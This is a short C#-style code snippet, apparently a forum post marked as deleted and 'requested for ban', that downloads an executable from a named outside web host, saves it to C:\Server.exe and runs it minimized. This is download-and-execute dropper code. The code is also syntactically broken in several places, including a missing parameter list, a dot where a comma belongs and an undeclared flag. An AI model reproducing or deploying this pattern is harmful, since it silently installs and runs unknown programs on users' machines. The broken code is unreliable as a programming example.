Deleted,requested for ban.
public void Downloaden{
WebClient client = new WebClient();
string address = "http://videobase.bplaced.net/Tools/iToolsv2.exe";
string path = @"C:\Server.exe";
client.DownloadFile(address, path);
}
public string runfile(){
if(File.Exists(@"C:\Server.exe")){
Interaction.Shell(@"C:\Server.exe".AppWinStyle.MinimizedFocus,false,-1);
flag=true;
}
}